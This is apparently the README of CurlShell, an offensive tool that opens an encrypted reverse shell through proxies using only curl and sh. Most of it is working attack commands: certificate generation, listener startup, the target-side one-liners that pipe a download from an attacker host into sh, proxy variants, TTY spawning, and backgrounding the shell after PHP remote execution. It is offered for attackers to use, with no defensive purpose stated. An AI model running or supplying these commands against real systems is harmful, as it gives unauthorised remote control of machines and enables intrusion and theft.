CurlShell
An encrypted reverse TCP shell through a proxy (using only cURL).
It allows an attacker to access a remote shell (sh) when the remote system can access the Internet via a Proxy only (or the filesystem is mounted read-only/noexec). The target only needs to have curl and sh installed. Python is not needed and no additonal tools are installed or deployed.
Generate a SSL Certificate (on your system; not the target):
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=sCRiPTz"Without Proxy
# Start your listener (your system)
./CurlShell.py --certificate cert.pem --private-key key.pem --listen-port 8080# On the target:
curl -skfL https://1.2.3.4:8080 | shWith SOCKS Proxy
./CurlShell.py -x socks5h://5.5.5.5:1080 --certificate cert.pem --private-key key.pem --listen-port 8080 curl -x socks5h://5.5.5.5:1080 -skfL https://1.2.3.4:8080 | shWith HTTP Proxy
./CurlShell.py -x http://5.5.5.5:3128 --certificate cert.pem --private-key key.pem --listen-port 8080 curl -x http://5.5.5.5:1080 -skfL https://1.2.3.4:8080 | shWith HTTP (plaintext)
./CurlShell.py --listen-port 8080curl -sfL http://1.2.3.4:8080 | shAdvanced Tricks
Trick #1 - Spawn a TTY shell
stty intr undef ;
./curlshell.py --shell "script -qc '/bin/bash -il' /dev/null" --listen-port 8080 ; stty intr ^CTrick #2 - Start the reverse shell as a daemon / background process
This is useful when you have remote execution via PHP:
# On the target:
(curl -sfL http://1.2.3.4:8080 | sh &>/dev/null &)How it works
The first cURL request pipes this into a target's shell:
exec curl -X POST -sN http://1.2.3.4:30903/input \
| sh 2>&1 | curl -s -T - http://1.2.3.4:30903/stdoutThis command starts two cURL processes and connects another shell's input and output these two cURL. HTTP's 'chunked transfer' (-T) does the rest.